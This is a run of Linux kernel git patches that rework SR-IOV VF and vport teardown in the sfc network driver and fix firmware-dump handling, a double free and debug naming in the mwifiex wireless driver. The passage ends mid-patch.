b/drivers/net/ethernet/sfc/ef10_sriov.c @@ -417,6 +417,15 @@ static int efx_ef10_pci_sriov_disable(struct efx_nic *efx) { struct pci_dev *dev = efx->pci_dev; + if (!efx->vf_count) + return 0; + + if (pci_vfs_assigned(dev)) { + netif_err(efx, drv, efx->net_dev, "VFs are assigned to guests; " + "please detach them before disabling SR-IOV\n"); + return -EBUSY; + } + pci_disable_sriov(dev); efx_ef10_sriov_free_vf_vswitching(efx); efx->vf_count = 0; From 2a3fc3112275e93df2e7e09b37b002ffddfd4ba1 Mon Sep 17 00:00:00 2001 From: Daniel Pieczko Date: Tue, 2 Jun 2015 11:40:46 +0100 Subject: [PATCH 613/872] sfc: force removal of VF and vport on driver removal When the driver unloads, force the unbind and removal of any VFs in the host with the PF. The PF cannot remove vports and vswitches if they are still being used by a VF driver, and when unloading the sfc driver the removal order is not guaranteed, so the instruction from the PF to the VF to unbind enforces a suitable ordering so that vswitches and vports can be removed. As a result of this, manually unbinding the driver from a single PF will result in all of its VFs in the host also being removed. Signed-off-by: Shradha Shah Signed-off-by: David S. 
Miller --- drivers/net/ethernet/sfc/ef10_sriov.c | 9 +++++++++ drivers/net/ethernet/sfc/efx.c | 3 ++- 2 files changed, 11 insertions(+), 1 deletion(-) diff --git a/drivers/net/ethernet/sfc/ef10_sriov.c b/drivers/net/ethernet/sfc/ef10_sriov.c index 083c534bc4ec..41ab18d4b107 100644 --- a/drivers/net/ethernet/sfc/ef10_sriov.c +++ b/drivers/net/ethernet/sfc/ef10_sriov.c @@ -448,11 +448,20 @@ int efx_ef10_sriov_init(struct efx_nic *efx) void efx_ef10_sriov_fini(struct efx_nic *efx) { struct efx_ef10_nic_data *nic_data = efx->nic_data; + unsigned int i; int rc; if (!nic_data->vf) return; + /* Remove any VFs in the host */ + for (i = 0; i < efx->vf_count; ++i) { + struct efx_nic *vf_efx = nic_data->vf[i].efx; + + if (vf_efx) + vf_efx->pci_dev->driver->remove(vf_efx->pci_dev); + } + rc = efx_ef10_pci_sriov_disable(efx); if (rc) netif_dbg(efx, drv, efx->net_dev, diff --git a/drivers/net/ethernet/sfc/efx.c b/drivers/net/ethernet/sfc/efx.c index de16cec7ec61..62b213973433 100644 --- a/drivers/net/ethernet/sfc/efx.c +++ b/drivers/net/ethernet/sfc/efx.c @@ -2902,7 +2902,8 @@ static void efx_pci_remove_main(struct efx_nic *efx) } /* Final NIC shutdown - * This is called only at module unload (or hotplug removal). + * This is called only at module unload (or hotplug removal). A PF can call + * this on its VFs to ensure they are unbound first. */ static void efx_pci_remove(struct pci_dev *pci_dev) { From 6598dad26b7fa39003e4de85d68c584666d5bc21 Mon Sep 17 00:00:00 2001 From: Daniel Pieczko Date: Tue, 2 Jun 2015 11:41:00 +0100 Subject: [PATCH 614/872] sfc: leak vports if a VF is assigned during PF unload If any VF is assigned as the PF is unloaded, do not attempt to remove its vport or the vswitch. These will be removed if the driver binds to the PF again, as an entity reset occurs during probe. A 'force' flag is added to efx_ef10_pci_sriov_disable() to distinguish between disabling SR-IOV and driver unload. SR-IOV cannot be disabled if VFs are assigned to guests. If the PF driver is unloaded while VFs are assigned, the driver may try to bind to the VF again at a later point if the driver has been reloaded and the VF returns to the same domain as the PF. In this case, the PF will not have a VF data structure, so the VF can check this and drop out of probe early. In this case, efx->vf_count will be zero but VFs will be present. The user is advised to remove the VF and re-create it. The check at the beginning of efx_ef10_pci_sriov_disable() that efx->vf_count is non-zero is removed to allow SR-IOV to be disabled in this case. Also, if the PF driver is unloaded, it will disable SR-IOV to remove these unknown VFs. By not disabling bus-mastering if VFs are still assigned, the VF will continue to pass traffic after the PF has been removed. When using the max_vfs module parameter, if VFs are already present do not try to initialise any more. Signed-off-by: Shradha Shah Signed-off-by: David S. 
Miller --- drivers/net/ethernet/sfc/ef10.c | 20 +++++++++++++++ drivers/net/ethernet/sfc/ef10_sriov.c | 35 ++++++++++++++++++--------- drivers/net/ethernet/sfc/ef10_sriov.h | 2 ++ drivers/net/ethernet/sfc/efx.c | 4 ++- 4 files changed, 49 insertions(+), 12 deletions(-) diff --git a/drivers/net/ethernet/sfc/ef10.c b/drivers/net/ethernet/sfc/ef10.c index 6b8d8f254515..847643455468 100644 --- a/drivers/net/ethernet/sfc/ef10.c +++ b/drivers/net/ethernet/sfc/ef10.c @@ -681,6 +681,24 @@ static int efx_ef10_probe_pf(struct efx_nic *efx) static int efx_ef10_probe_vf(struct efx_nic *efx) { int rc; + struct pci_dev *pci_dev_pf; + + /* If the parent PF has no VF data structure, it doesn't know about this + * VF so fail probe. The VF needs to be re-created. This can happen + * if the PF driver is unloaded while the VF is assigned to a guest. + */ + pci_dev_pf = efx->pci_dev->physfn; + if (pci_dev_pf) { + struct efx_nic *efx_pf = pci_get_drvdata(pci_dev_pf); + struct efx_ef10_nic_data *nic_data_pf = efx_pf->nic_data; + + if (!nic_data_pf->vf) { + netif_info(efx, drv, efx->net_dev, + "The VF cannot link to its parent PF; " + "please destroy and re-create the VF\n"); + return -EBUSY; + } + } rc = efx_ef10_probe(efx); if (rc) @@ -698,6 +716,8 @@ static int efx_ef10_probe_vf(struct efx_nic *efx) struct efx_ef10_nic_data *nic_data = efx->nic_data; nic_data_p->vf[nic_data->vf_index].efx = efx; + nic_data_p->vf[nic_data->vf_index].pci_dev = + efx->pci_dev; } else netif_info(efx, drv, efx->net_dev, "Could not get the PF id from VF\n"); diff --git a/drivers/net/ethernet/sfc/ef10_sriov.c b/drivers/net/ethernet/sfc/ef10_sriov.c index 41ab18d4b107..6c9b6e45509a 100644 --- a/drivers/net/ethernet/sfc/ef10_sriov.c +++ b/drivers/net/ethernet/sfc/ef10_sriov.c @@ -165,6 +165,11 @@ static void efx_ef10_sriov_free_vf_vports(struct efx_nic *efx) for (i = 0; i < efx->vf_count; i++) { struct ef10_vf *vf = nic_data->vf + i; + /* If VF is assigned, do not free the vport */ + if (vf->pci_dev && + vf->pci_dev->dev_flags & PCI_DEV_FLAGS_ASSIGNED) + continue; + if (vf->vport_assigned) { efx_ef10_evb_port_assign(efx, EVB_PORT_ID_NULL, i); vf->vport_assigned = 0; @@ -380,7 +385,9 @@ void efx_ef10_vswitching_remove_pf(struct efx_nic *efx) efx_ef10_vport_free(efx, nic_data->vport_id); nic_data->vport_id = EVB_PORT_ID_ASSIGNED; - efx_ef10_vswitch_free(efx, nic_data->vport_id); + /* Only free the vswitch if no VFs are assigned */ + if (!pci_vfs_assigned(efx->pci_dev)) + efx_ef10_vswitch_free(efx, nic_data->vport_id); } void efx_ef10_vswitching_remove_vf(struct efx_nic *efx) @@ -413,20 +420,22 @@ static int efx_ef10_pci_sriov_enable(struct efx_nic *efx, int num_vfs) return rc; } -static int efx_ef10_pci_sriov_disable(struct efx_nic *efx) +static int efx_ef10_pci_sriov_disable(struct efx_nic *efx, bool force) { struct pci_dev *dev = efx->pci_dev; + unsigned int vfs_assigned = 0; - if (!efx->vf_count) - return 0; + vfs_assigned = pci_vfs_assigned(dev); - if (pci_vfs_assigned(dev)) { - netif_err(efx, drv, efx->net_dev, "VFs are assigned to guests; " - "please detach them before disabling SR-IOV\n"); + if (vfs_assigned && !force) { + netif_info(efx, drv, efx->net_dev, "VFs are assigned to guests; " + "please detach them before disabling SR-IOV\n"); return -EBUSY; } - pci_disable_sriov(dev); + if (!vfs_assigned) + pci_disable_sriov(dev); + efx_ef10_sriov_free_vf_vswitching(efx); efx->vf_count = 0; return 0; @@ -435,7 +444,7 @@ static int efx_ef10_pci_sriov_disable(struct efx_nic *efx) int efx_ef10_sriov_configure(struct efx_nic *efx, int 
num_vfs) { if (num_vfs == 0) - return efx_ef10_pci_sriov_disable(efx); + return efx_ef10_pci_sriov_disable(efx, false); else return efx_ef10_pci_sriov_enable(efx, num_vfs); } @@ -451,8 +460,12 @@ void efx_ef10_sriov_fini(struct efx_nic *efx) unsigned int i; int rc; - if (!nic_data->vf) + if (!nic_data->vf) { + /* Remove any un-assigned orphaned VFs */ + if (pci_num_vf(efx->pci_dev) && !pci_vfs_assigned(efx->pci_dev)) + pci_disable_sriov(efx->pci_dev); return; + } /* Remove any VFs in the host */ for (i = 0; i < efx->vf_count; ++i) { @@ -462,7 +475,7 @@ void efx_ef10_sriov_fini(struct efx_nic *efx) vf_efx->pci_dev->driver->remove(vf_efx->pci_dev); } - rc = efx_ef10_pci_sriov_disable(efx); + rc = efx_ef10_pci_sriov_disable(efx, true); if (rc) netif_dbg(efx, drv, efx->net_dev, "Disabling SRIOV was not successful rc=%d\n", rc); diff --git a/drivers/net/ethernet/sfc/ef10_sriov.h b/drivers/net/ethernet/sfc/ef10_sriov.h index ffc92a504c3f..db4ef537c610 100644 --- a/drivers/net/ethernet/sfc/ef10_sriov.h +++ b/drivers/net/ethernet/sfc/ef10_sriov.h @@ -15,6 +15,7 @@ /** * struct ef10_vf - PF's store of VF data * @efx: efx_nic struct for the current VF + * @pci_dev: the pci_dev struct for the VF, retained while the VF is assigned * @vport_id: vport ID for the VF * @vport_assigned: record whether the vport is currently assigned to the VF * @mac: MAC address for the VF, zero when address is removed from the vport @@ -22,6 +23,7 @@ */ struct ef10_vf { struct efx_nic *efx; + struct pci_dev *pci_dev; unsigned int vport_id; unsigned int vport_assigned; u8 mac[ETH_ALEN]; diff --git a/drivers/net/ethernet/sfc/efx.c b/drivers/net/ethernet/sfc/efx.c index 62b213973433..0c42ed9c9e4c 100644 --- a/drivers/net/ethernet/sfc/efx.c +++ b/drivers/net/ethernet/sfc/efx.c @@ -1298,7 +1298,9 @@ static void efx_fini_io(struct efx_nic *efx) efx->membase_phys = 0; } - pci_disable_device(efx->pci_dev); + /* Don't disable bus-mastering if VFs are assigned */ + if (!pci_vfs_assigned(efx->pci_dev)) + pci_disable_device(efx->pci_dev); } void efx_set_default_rx_indir_table(struct efx_nic *efx) From e065ddb891755c74f73c60989f96784f3aa65f81 Mon Sep 17 00:00:00 2001 From: Amitkumar Karwar Date: Tue, 26 May 2015 06:34:27 -0700 Subject: [PATCH 615/872] mwifiex: fix SDIO firmware dump problem It's been observed that firmware doesn't go back to normal state when all firmware memories are dumped. As a result, further commands are blocked. This happens due to missing driver change of writing READ DONE to control register for SDIO interface. This patch adds a missing change to fix the problem. 
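
As an illustrative sketch of the handshake being restored (the register name, value and helpers below are hypothetical, not the mwifiex API): once the last memory segment has been read, the host writes a "read done" value to the dump control register so the firmware can leave dump mode; omitting that final write is what left further commands blocked.

/*
 * Illustrative sketch only -- hypothetical register helpers.  The key
 * step is the write after the last segment: it releases the firmware
 * from dump mode so normal commands can resume.
 */
#include <stdint.h>
#include <stdio.h>

#define DUMP_CTRL_REG	0x64	/* hypothetical dump control register */
#define DUMP_READ_DONE	0xfe	/* hypothetical "host finished" value */

static int write_reg(uint32_t reg, uint8_t val)
{
	/* stand-in for a bus write; always succeeds here */
	printf("write reg %#x <- %#x\n", (unsigned)reg, (unsigned)val);
	return 0;
}

static uint32_t next_segment_size(void)
{
	return 0;	/* pretend the firmware reports no more segments */
}

static int dump_fw_memory(void)
{
	for (;;) {
		uint32_t size = next_segment_size();

		if (size == 0) {
			/* all segments dumped: tell the firmware we are done */
			if (write_reg(DUMP_CTRL_REG, DUMP_READ_DONE))
				return -1;
			break;
		}
		/* ...read 'size' bytes of this segment here... */
	}
	return 0;
}

int main(void)
{
	return dump_fw_memory();
}
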
Signed-off-by: Amitkumar Karwar Signed-off-by: Cathy Luo Signed-off-by: Kalle Valo --- drivers/net/wireless/mwifiex/sdio.c | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/drivers/net/wireless/mwifiex/sdio.c b/drivers/net/wireless/mwifiex/sdio.c index f4b1de7977ab..a3d810b866c1 100644 --- a/drivers/net/wireless/mwifiex/sdio.c +++ b/drivers/net/wireless/mwifiex/sdio.c @@ -2241,6 +2241,13 @@ static void mwifiex_sdio_fw_dump_work(struct mwifiex_adapter *adapter) if (memory_size == 0) { mwifiex_dbg(adapter, DUMP, "Firmware dump Finished!\n"); + ret = mwifiex_write_reg(adapter, + card->reg->fw_dump_ctrl, + FW_DUMP_READ_DONE); + if (ret) { + mwifiex_dbg(adapter, ERROR, "SDIO write err\n"); + return; + } break; } From 0769b27739ee420a391ee66a431c1474370aec6b Mon Sep 17 00:00:00 2001 From: Amitkumar Karwar Date: Tue, 26 May 2015 06:34:28 -0700 Subject: [PATCH 616/872] mwifiex: fix a possible double free issue As drv_info_dump pointer doesn't get reset, we may end up freeing the allocated memory twice. Signed-off-by: Amitkumar Karwar Signed-off-by: Cathy Luo Signed-off-by: Kalle Valo --- drivers/net/wireless/mwifiex/init.c | 1 + drivers/net/wireless/mwifiex/main.c | 1 + 2 files changed, 2 insertions(+) diff --git a/drivers/net/wireless/mwifiex/init.c b/drivers/net/wireless/mwifiex/init.c index fdf38d06a0aa..df7fdc09d38c 100644 --- a/drivers/net/wireless/mwifiex/init.c +++ b/drivers/net/wireless/mwifiex/init.c @@ -435,6 +435,7 @@ mwifiex_adapter_cleanup(struct mwifiex_adapter *adapter) if (adapter->drv_info_dump) { vfree(adapter->drv_info_dump); + adapter->drv_info_dump = NULL; adapter->drv_info_size = 0; } diff --git a/drivers/net/wireless/mwifiex/main.c b/drivers/net/wireless/mwifiex/main.c index 138c1cccf7d3..cb0097890d3f 100644 --- a/drivers/net/wireless/mwifiex/main.c +++ b/drivers/net/wireless/mwifiex/main.c @@ -886,6 +886,7 @@ void mwifiex_dump_drv_info(struct mwifiex_adapter *adapter) if (adapter->drv_info_dump) { vfree(adapter->drv_info_dump); + adapter->drv_info_dump = NULL; adapter->drv_info_size = 0; } From 38b130e22e40fd81c979952172d9a4be2e0edff9 Mon Sep 17 00:00:00 2001 From: Amitkumar Karwar Date: Tue, 26 May 2015 06:34:29 -0700 Subject: [PATCH 617/872] mwifiex: dump driver information for PCIe interface Currently we are dumping driver information only for SDIO interface. This patch adds missing mwifiex_dump_drv_info() call for PCIe interface. Signed-off-by: Amitkumar Karwar Signed-off-by: Cathy Luo Signed-off-by: Kalle Valo --- drivers/net/wireless/mwifiex/pcie.c | 2 ++ 1 file changed, 2 insertions(+) diff --git a/drivers/net/wireless/mwifiex/pcie.c b/drivers/net/wireless/mwifiex/pcie.c index 7219243e9994..86ed396c88ea 100644 --- a/drivers/net/wireless/mwifiex/pcie.c +++ b/drivers/net/wireless/mwifiex/pcie.c @@ -2316,6 +2316,8 @@ static void mwifiex_pcie_fw_dump_work(struct mwifiex_adapter *adapter) int ret; static char *env[] = { "DRIVER=mwifiex_pcie", "EVENT=fw_dump", NULL }; + mwifiex_dump_drv_info(adapter); + if (!card->pcie.can_dump_fw) return; From 9cc0dbf0436767f0fc24c123aa1ba3aeccd145fb Mon Sep 17 00:00:00 2001 From: Amitkumar Karwar Date: Tue, 26 May 2015 06:34:30 -0700 Subject: [PATCH 618/872] mwifiex: minor changes in debug messages Small letters are used in debug messages to match coding style at other places. 
Signed-off-by: Amitkumar Karwar Signed-off-by: Cathy Luo Signed-off-by: Kalle Valo --- drivers/net/wireless/mwifiex/main.c | 8 ++++---- drivers/net/wireless/mwifiex/sdio.c | 4 ++-- 2 files changed, 6 insertions(+), 6 deletions(-) diff --git a/drivers/net/wireless/mwifiex/main.c b/drivers/net/wireless/mwifiex/main.c index cb0097890d3f..3e7774fab9b0 100644 --- a/drivers/net/wireless/mwifiex/main.c +++ b/drivers/net/wireless/mwifiex/main.c @@ -890,7 +890,7 @@ void mwifiex_dump_drv_info(struct mwifiex_adapter *adapter) adapter->drv_info_size = 0; } - mwifiex_dbg(adapter, MSG, "=== DRIVER INFO DUMP START===\n"); + mwifiex_dbg(adapter, MSG, "===mwifiex driverinfo dump start===\n"); adapter->drv_info_dump = vzalloc(MWIFIEX_DRV_INFO_SIZE_MAX); @@ -958,12 +958,12 @@ void mwifiex_dump_drv_info(struct mwifiex_adapter *adapter) } if (adapter->iface_type == MWIFIEX_SDIO) { - p += sprintf(p, "\n=== SDIO register DUMP===\n"); + p += sprintf(p, "\n=== SDIO register dump===\n"); if (adapter->if_ops.reg_dump) p += adapter->if_ops.reg_dump(adapter, p); } - p += sprintf(p, "\n=== MORE DEBUG INFORMATION\n"); + p += sprintf(p, "\n=== more debug information\n"); debug_info = kzalloc(sizeof(*debug_info), GFP_KERNEL); if (debug_info) { for (i = 0; i < adapter->priv_num; i++) { @@ -978,7 +978,7 @@ void mwifiex_dump_drv_info(struct mwifiex_adapter *adapter) } adapter->drv_info_size = p - adapter->drv_info_dump; - mwifiex_dbg(adapter, MSG, "=== DRIVER INFO DUMP END===\n"); + mwifiex_dbg(adapter, MSG, "===mwifiex driverinfo dump end===\n"); } EXPORT_SYMBOL_GPL(mwifiex_dump_drv_info); diff --git a/drivers/net/wireless/mwifiex/sdio.c b/drivers/net/wireless/mwifiex/sdio.c index a3d810b866c1..467ee9ad5085 100644 --- a/drivers/net/wireless/mwifiex/sdio.c +++ b/drivers/net/wireless/mwifiex/sdio.c @@ -2356,7 +2356,7 @@ mwifiex_sdio_reg_dump(struct mwifiex_adapter *adapter, char *drv_buf) if (!p) return 0; - mwifiex_dbg(adapter, MSG, "SDIO register DUMP START\n"); + mwifiex_dbg(adapter, MSG, "SDIO register dump start\n"); mwifiex_pm_wakeup_card(adapter); @@ -2428,7 +2428,7 @@ mwifiex_sdio_reg_dump(struct mwifiex_adapter *adapter, char *drv_buf) sdio_release_host(cardp->func); - mwifiex_dbg(adapter, MSG, "SDIO register DUMP END\n"); + mwifiex_dbg(adapter, MSG, "SDIO register dump end\n"); return p - drv_buf; } From fc697159ad4c403fe0ddf226bf9a082cfecb6854 Mon Sep 17 00:00:00 2001 From: Amitkumar Karwar Date: Tue, 26 May 2015 06:34:31 -0700 Subject: [PATCH 619/872] mwifiex: use generic name 'device dump' Currently we are dumping driver information also inside firmware dump API. We will call it as device dump and dump driver and firmware data separately. Signed-off-by: Amitkumar Karwar Signed-off-by: Cathy Luo Signed-off-by: Kalle Valo --- drivers/net/wireless/mwifiex/README | 6 +++--- drivers/net/wireless/mwifiex/cmdevt.c | 4 ++-- drivers/net/wireless/mwifiex/debugfs.c | 20 ++++++++++---------- drivers/net/wireless/mwifiex/ethtool.c | 12 ++++++------ drivers/net/wireless/mwifiex/main.c | 4 ++-- drivers/net/wireless/mwifiex/main.h | 6 +++--- drivers/net/wireless/mwifiex/pcie.c | 22 +++++++++++++--------- drivers/net/wireless/mwifiex/sdio.c | 22 +++++++++++++--------- 8 files changed, 52 insertions(+), 44 deletions(-) diff --git a/drivers/net/wireless/mwifiex/README b/drivers/net/wireless/mwifiex/README index 31928caeeed2..2f0f9b5609d0 100644 --- a/drivers/net/wireless/mwifiex/README +++ b/drivers/net/wireless/mwifiex/README @@ -230,9 +230,9 @@ getlog cat getlog -fw_dump - This command is used to dump firmware memory into files. 
- Separate file will be created for each memory segment. +device_dump + This command is used to dump driver information and firmware memory + segments. Usage: cat fw_dump diff --git a/drivers/net/wireless/mwifiex/cmdevt.c b/drivers/net/wireless/mwifiex/cmdevt.c index ac89a1dd711b..a1de83fd1dbe 100644 --- a/drivers/net/wireless/mwifiex/cmdevt.c +++ b/drivers/net/wireless/mwifiex/cmdevt.c @@ -993,8 +993,8 @@ mwifiex_cmd_timeout_func(unsigned long function_context) if (adapter->hw_status == MWIFIEX_HW_STATUS_INITIALIZING) mwifiex_init_fw_complete(adapter); - if (adapter->if_ops.fw_dump) - adapter->if_ops.fw_dump(adapter); + if (adapter->if_ops.device_dump) + adapter->if_ops.device_dump(adapter); if (adapter->if_ops.card_reset) adapter->if_ops.card_reset(adapter); diff --git a/drivers/net/wireless/mwifiex/debugfs.c b/drivers/net/wireless/mwifiex/debugfs.c index 8895906b300e..5a0636d43a1b 100644 --- a/drivers/net/wireless/mwifiex/debugfs.c +++ b/drivers/net/wireless/mwifiex/debugfs.c @@ -152,24 +152,24 @@ mwifiex_info_read(struct file *file, char __user *ubuf, } /* - * Proc firmware dump read handler. + * Proc device dump read handler. * - * This function is called when the 'fw_dump' file is opened for + * This function is called when the 'device_dump' file is opened for * reading. - * This function dumps firmware memory in different files - * (ex. DTCM, ITCM, SQRAM etc.) based on the the segments for + * This function dumps driver information and firmware memory segments + * (ex. DTCM, ITCM, SQRAM etc.) for * debugging. */ static ssize_t -mwifiex_fw_dump_read(struct file *file, char __user *ubuf, - size_t count, loff_t *ppos) +mwifiex_device_dump_read(struct file *file, char __user *ubuf, + size_t count, loff_t *ppos) { struct mwifiex_private *priv = file->private_data; - if (!priv->adapter->if_ops.fw_dump) + if (!priv->adapter->if_ops.device_dump) return -EIO; - priv->adapter->if_ops.fw_dump(priv->adapter); + priv->adapter->if_ops.device_dump(priv->adapter); return 0; } @@ -885,7 +885,7 @@ static const struct file_operations mwifiex_dfs_##name##_fops = { \ MWIFIEX_DFS_FILE_READ_OPS(info); MWIFIEX_DFS_FILE_READ_OPS(debug); MWIFIEX_DFS_FILE_READ_OPS(getlog); -MWIFIEX_DFS_FILE_READ_OPS(fw_dump); +MWIFIEX_DFS_FILE_READ_OPS(device_dump); MWIFIEX_DFS_FILE_OPS(regrdwr); MWIFIEX_DFS_FILE_OPS(rdeeprom); MWIFIEX_DFS_FILE_OPS(memrw); @@ -913,7 +913,7 @@ mwifiex_dev_debugfs_init(struct mwifiex_private *priv) MWIFIEX_DFS_ADD_FILE(getlog); MWIFIEX_DFS_ADD_FILE(regrdwr); MWIFIEX_DFS_ADD_FILE(rdeeprom); - MWIFIEX_DFS_ADD_FILE(fw_dump); + MWIFIEX_DFS_ADD_FILE(device_dump); MWIFIEX_DFS_ADD_FILE(memrw); MWIFIEX_DFS_ADD_FILE(hscfg); MWIFIEX_DFS_ADD_FILE(histogram); diff --git a/drivers/net/wireless/mwifiex/ethtool.c b/drivers/net/wireless/mwifiex/ethtool.c index a6b3b41d5909..c78bf0a340fb 100644 --- a/drivers/net/wireless/mwifiex/ethtool.c +++ b/drivers/net/wireless/mwifiex/ethtool.c @@ -71,7 +71,7 @@ mwifiex_get_dump_flag(struct net_device *dev, struct ethtool_dump *dump) struct mwifiex_adapter *adapter = priv->adapter; struct memory_type_mapping *entry; - if (!adapter->if_ops.fw_dump) + if (!adapter->if_ops.device_dump) return -ENOTSUPP; dump->flag = adapter->curr_mem_idx; @@ -97,7 +97,7 @@ mwifiex_get_dump_data(struct net_device *dev, struct ethtool_dump *dump, struct mwifiex_adapter *adapter = priv->adapter; struct memory_type_mapping *entry; - if (!adapter->if_ops.fw_dump) + if (!adapter->if_ops.device_dump) return -ENOTSUPP; if (adapter->curr_mem_idx == MWIFIEX_DRV_INFO_IDX) { @@ -109,7 +109,7 @@ 
mwifiex_get_dump_data(struct net_device *dev, struct ethtool_dump *dump, if (adapter->curr_mem_idx == MWIFIEX_FW_DUMP_IDX) { mwifiex_dbg(adapter, ERROR, - "firmware dump in progress!!\n"); + "device dump in progress!!\n"); return -EBUSY; } @@ -132,7 +132,7 @@ static int mwifiex_set_dump(struct net_device *dev, struct ethtool_dump *val) struct mwifiex_private *priv = mwifiex_netdev_get_priv(dev); struct mwifiex_adapter *adapter = priv->adapter; - if (!adapter->if_ops.fw_dump) + if (!adapter->if_ops.device_dump) return -ENOTSUPP; if (val->flag == MWIFIEX_DRV_INFO_IDX) { @@ -142,13 +142,13 @@ static int mwifiex_set_dump(struct net_device *dev, struct ethtool_dump *val) if (adapter->curr_mem_idx == MWIFIEX_FW_DUMP_IDX) { mwifiex_dbg(adapter, ERROR, - "firmware dump in progress!!\n"); + "device dump in progress!!\n"); return -EBUSY; } if (val->flag == MWIFIEX_FW_DUMP_IDX) { adapter->curr_mem_idx = val->flag; - adapter->if_ops.fw_dump(adapter); + adapter->if_ops.device_dump(adapter); return 0; } diff --git a/drivers/net/wireless/mwifiex/main.c b/drivers/net/wireless/mwifiex/main.c index 3e7774fab9b0..b7fbc2cdf0bd 100644 --- a/drivers/net/wireless/mwifiex/main.c +++ b/drivers/net/wireless/mwifiex/main.c @@ -873,7 +873,7 @@ mwifiex_tx_timeout(struct net_device *dev) } } -void mwifiex_dump_drv_info(struct mwifiex_adapter *adapter) +void mwifiex_drv_info_dump(struct mwifiex_adapter *adapter) { void *p; char drv_version[64]; @@ -980,7 +980,7 @@ void mwifiex_dump_drv_info(struct mwifiex_adapter *adapter) adapter->drv_info_size = p - adapter->drv_info_dump; mwifiex_dbg(adapter, MSG, "===mwifiex driverinfo dump end===\n"); } -EXPORT_SYMBOL_GPL(mwifiex_dump_drv_info); +EXPORT_SYMBOL_GPL(mwifiex_drv_info_dump); /* * CFG802.11 network device handler for statistics retrieval. 
diff --git a/drivers/net/wireless/mwifiex/main.h b/drivers/net/wireless/mwifiex/main.h index 2f5516194e32..01111fe72a43 100644 --- a/drivers/net/wireless/mwifiex/main.h +++ b/drivers/net/wireless/mwifiex/main.h @@ -499,7 +499,7 @@ enum rdwr_status { }; enum mwifiex_iface_work_flags { - MWIFIEX_IFACE_WORK_FW_DUMP, + MWIFIEX_IFACE_WORK_DEVICE_DUMP, MWIFIEX_IFACE_WORK_CARD_RESET, }; @@ -789,8 +789,8 @@ struct mwifiex_if_ops { int (*init_fw_port) (struct mwifiex_adapter *); int (*dnld_fw) (struct mwifiex_adapter *, struct mwifiex_fw_image *); void (*card_reset) (struct mwifiex_adapter *); - void (*fw_dump)(struct mwifiex_adapter *); int (*reg_dump)(struct mwifiex_adapter *, char *); + void (*device_dump)(struct mwifiex_adapter *); int (*clean_pcie_ring) (struct mwifiex_adapter *adapter); void (*iface_work)(struct work_struct *work); void (*submit_rem_rx_urbs)(struct mwifiex_adapter *adapter); @@ -1484,7 +1484,7 @@ void mwifiex_hist_data_add(struct mwifiex_private *priv, u8 mwifiex_adjust_data_rate(struct mwifiex_private *priv, u8 rx_rate, u8 ht_info); -void mwifiex_dump_drv_info(struct mwifiex_adapter *adapter); +void mwifiex_drv_info_dump(struct mwifiex_adapter *adapter); void *mwifiex_alloc_dma_align_buf(int rx_len, gfp_t flags); void mwifiex_queue_main_work(struct mwifiex_adapter *adapter); diff --git a/drivers/net/wireless/mwifiex/pcie.c b/drivers/net/wireless/mwifiex/pcie.c index 86ed396c88ea..3a9936843c21 100644 --- a/drivers/net/wireless/mwifiex/pcie.c +++ b/drivers/net/wireless/mwifiex/pcie.c @@ -2305,7 +2305,7 @@ mwifiex_pcie_rdwr_firmware(struct mwifiex_adapter *adapter, u8 doneflag) } /* This function dump firmware memory to file */ -static void mwifiex_pcie_fw_dump_work(struct mwifiex_adapter *adapter) +static void mwifiex_pcie_fw_dump(struct mwifiex_adapter *adapter) { struct pcie_service_card *card = adapter->card; const struct mwifiex_pcie_card_reg *creg = card->pcie.reg; @@ -2316,8 +2316,6 @@ static void mwifiex_pcie_fw_dump_work(struct mwifiex_adapter *adapter) int ret; static char *env[] = { "DRIVER=mwifiex_pcie", "EVENT=fw_dump", NULL }; - mwifiex_dump_drv_info(adapter); - if (!card->pcie.can_dump_fw) return; @@ -2419,24 +2417,30 @@ static void mwifiex_pcie_fw_dump_work(struct mwifiex_adapter *adapter) adapter->curr_mem_idx = 0; } +static void mwifiex_pcie_device_dump_work(struct mwifiex_adapter *adapter) +{ + mwifiex_drv_info_dump(adapter); + mwifiex_pcie_fw_dump(adapter); +} + static unsigned long iface_work_flags; static struct mwifiex_adapter *save_adapter; static void mwifiex_pcie_work(struct work_struct *work) { - if (test_and_clear_bit(MWIFIEX_IFACE_WORK_FW_DUMP, + if (test_and_clear_bit(MWIFIEX_IFACE_WORK_DEVICE_DUMP, &iface_work_flags)) - mwifiex_pcie_fw_dump_work(save_adapter); + mwifiex_pcie_device_dump_work(save_adapter); } static DECLARE_WORK(pcie_work, mwifiex_pcie_work); /* This function dumps FW information */ -static void mwifiex_pcie_fw_dump(struct mwifiex_adapter *adapter) +static void mwifiex_pcie_device_dump(struct mwifiex_adapter *adapter) { save_adapter = adapter; - if (test_bit(MWIFIEX_IFACE_WORK_FW_DUMP, &iface_work_flags)) + if (test_bit(MWIFIEX_IFACE_WORK_DEVICE_DUMP, &iface_work_flags)) return; - set_bit(MWIFIEX_IFACE_WORK_FW_DUMP, &iface_work_flags); + set_bit(MWIFIEX_IFACE_WORK_DEVICE_DUMP, &iface_work_flags); schedule_work(&pcie_work); } @@ -2673,7 +2677,7 @@ static struct mwifiex_if_ops pcie_ops = { .cleanup_mpa_buf = NULL, .init_fw_port = mwifiex_pcie_init_fw_port, .clean_pcie_ring = mwifiex_clean_pcie_ring_buf, - .fw_dump = 
mwifiex_pcie_fw_dump, + .device_dump = mwifiex_pcie_device_dump, }; /* diff --git a/drivers/net/wireless/mwifiex/sdio.c b/drivers/net/wireless/mwifiex/sdio.c index 467ee9ad5085..1f32c0214c82 100644 --- a/drivers/net/wireless/mwifiex/sdio.c +++ b/drivers/net/wireless/mwifiex/sdio.c @@ -2177,7 +2177,7 @@ rdwr_status mwifiex_sdio_rdwr_firmware(struct mwifiex_adapter *adapter, } /* This function dump firmware memory to file */ -static void mwifiex_sdio_fw_dump_work(struct mwifiex_adapter *adapter) +static void mwifiex_sdio_fw_dump(struct mwifiex_adapter *adapter) { struct sdio_mmc_card *card = adapter->card; int ret = 0; @@ -2187,8 +2187,6 @@ static void mwifiex_sdio_fw_dump_work(struct mwifiex_adapter *adapter) u32 memory_size; static char *env[] = { "DRIVER=mwifiex_sdio", "EVENT=fw_dump", NULL }; - mwifiex_dump_drv_info(adapter); - if (!card->can_dump_fw) return; @@ -2306,11 +2304,17 @@ static void mwifiex_sdio_fw_dump_work(struct mwifiex_adapter *adapter) adapter->curr_mem_idx = 0; } +static void mwifiex_sdio_device_dump_work(struct mwifiex_adapter *adapter) +{ + mwifiex_drv_info_dump(adapter); + mwifiex_sdio_fw_dump(adapter); +} + static void mwifiex_sdio_work(struct 